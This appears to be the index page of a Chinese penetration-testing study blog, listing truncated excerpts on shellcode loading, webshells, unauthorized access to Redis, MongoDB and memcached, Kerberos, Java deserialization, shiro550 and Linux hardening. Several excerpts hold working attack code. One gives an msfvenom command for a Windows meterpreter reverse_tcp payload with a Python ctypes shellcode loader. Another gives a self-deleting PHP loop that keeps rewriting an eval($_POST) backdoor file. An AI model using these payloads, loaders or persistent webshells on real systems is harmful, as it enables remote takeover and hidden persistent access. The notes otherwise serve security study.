wangzhiii的博客

生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.98 LPORT=2333 -f py import ctypesimport sysfrom ctypes import *# 192.168.151.171 2333buf = b""buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"....PAGE_EXECUTE_READWRITE = 0x00000040 # 参数设定VIRTUAL_MEM = (0x1000 | 0x2000) # 参数设定buf_arr = bytearray(buf) # shellcode变为一个新的字节数组buf_size = len(buf_arr) # 计算shellcode的大小kernel32 = ctypes.cdll.LoadLibrary("kernel32.dll") # 调用kernel32.d11kerne ...

两种 1.不死马，直接用代码写一个死循环，不间断写入php shell,或者执行一段代码 <?php set_time_limit(0);// 设置脚本执行的最大时间限制。将参数设置为0意味着脚本可以无限制地运行，没有时间限制。 ignore_user_abort(1);// 用户访问完成代码仍然继续运行 unlink(__FILE__);// 删除当前正在执行的 PHP 文件。__FILE__ 是一个常量，表示当前执行脚本的文件的完整路径和文件名。 while (1) {// 无限循环 $content = '<?php @eval($_POST["test"]) ?>'; file_put_contents("shell.php", $content);// 用于将字符串内容写入到文件中 usleep(10000);// 让脚本休眠一段时间，以微秒为单位 }?> 2.fastcgi马，利用php-fpm可 ...

javaclassloader是什么classloader是java动态类加载机制，在java中类加载分为加载，连接，初始化，classloader是负责加载和连接的，加载器可以根据需要动态的加载类，使得程序在运行时可以动态的扩展，无需在编译时将所有的类都加载进来 classloader实现了一种双亲委派模型， 四种类加载器 BootStrapClassLoader系统类根类加载器 加载 核心类库里面的类 java.lang包 PlatformClassLoader 平台类加载器 加载核心类库里面的一些类 AppClassLoader系统类加载器 加载的是自己编写的类 自定义类加载器 加载网络环境下的类 加载自定义classloader的前提是什么加载自定义ClassLoader的前提是需要一个已经存在的ClassLoader。因为ClassLoader本身也是一个Java类，它也需要被加载和实例化。在Java中，所有的ClassLoader都是由其他ClassLoader加载的，最终都会由Bootstrap ClassLoader(系统根类加载器)加载。 调用类的四种方法 ...

默认端口：21, 139, 873, 2049, 2181, 2182, 2375, 5601, 5672, 5900, 5901, 5984, 6379, 6443, 8080, 8088, 8095, 8161, 9100, 9200, 9300, 11211, 15672, 15692, 20048, 25672, 27017 1.redis未授权 默认端口6379 漏洞验证 安装Redis，然后连接到服务。 # yum install redis # redis-cli -h 10.2.20.73 -p 6379 10.2.20.73:6379> info 2.mongodb未授权 默认端口27017 漏洞验证 安装mongodb，然后连接到服务。 # yum install mongodb # mongo –host 10.2.20.34 –port 27017 xxx-test:SECONDARY> show dbs 3.memcached未授权访问 默认端口11211 漏洞验证 telnet 10.10.4.89 11211 或 nc -vv 112 ...

weblogic的一些漏洞学习记录

CS DNS隧道上线https://whale3070.github.io/2021/02/05/11-x/#%E5%9F%BA%E7%A1%80 windows三大认证本地认证自己登陆自己电脑 网络认证两台电脑之间要访问资源，可以通过网络认证后进行访问 kerberos 认证 域环境中的认证方式 https://blog.csdn.net/zzq060143/article/details/120531735 https://www.freebuf.com/articles/network/371446.html 客户端服务端密钥分发中心密钥分发中心KDC(Key Distribution Center ) ，密钥分发中心一般又分为两部分，分别是 ​ AS(Authentication Server):认证服务器，专门用来认证客户端的身份并发放客户用户访问的TGS的TGT(票据授予票据) ​ TGS(Ticket Granting Server): 票据授予服务器，用来发放整个认证过程以及客户端访问服务端是所系的服务授予票据(Ticket) 三次通信验证机制 第一次：客户端请求 ...

漏洞介绍 序列化就是把对象转换成字节流，便于保存在内存、文件、数据库中;反序列化即逆过程，由字节流还原成对象。 Java中的ObjectOutputStream类的writeObject()方法可以实现序列化，类ObjectlnputStream类的readobject()方法用于反序列化。 基础知识反序列化入门 https://blog.csdn.net/weixin_45808483/article/details/122545168 https://www.bilibili.com/video/BV16h411z7o9/?spm_id_from=333.788.video.desc.click&vd_source=46ee6094905cc129c486ece81308d827 被transient修饰过的变量不能被序列化，因为serialization是吧对象的状态存储到硬盘上，而有些敏感信息，例如银行卡号，是不希望在网络上传输的，transient的作用就是，吧这个变量的生命周期只存在内存中，而不会写到磁盘持久化 Externalizable接口 需要重写writeE ...

加固国标 GB/T25058 信息安全技术 信息系统安全等级保护实施指南 GB/T22240 信息安全技术 信息系统安全等级保护定级指南 GB/T22239 信息安全技术 网络安全等级保护基本要求 GB/T25070 信息安全技术 网络安全等级保护安全设计技术要求 GB/T28449 信息安全技术 网络安全等级保护评测过程指南 版本升级windows有弹框，linux没提示 关闭端口服务端口能不开就不开，最小安装原则 修改配置项修改安全配置，参数，可以为网络和 应用提供必要的安全防护 主机和网络ACL策略iptables,对于流量进行严格的控制，白名单 修改代码部署设备防护linux加固方向账号管理和认证授权修改目录权限chmod 750 directory# 默认目录权限是755 文件权限是644# 改为750 640或者 700 600 chown username:groupname directory#更改账户组文件的权限chmod 644 /etc/passwdchmod 600 /etc/shadowchmod 644 ...

一些漏洞

shiro550漏洞复现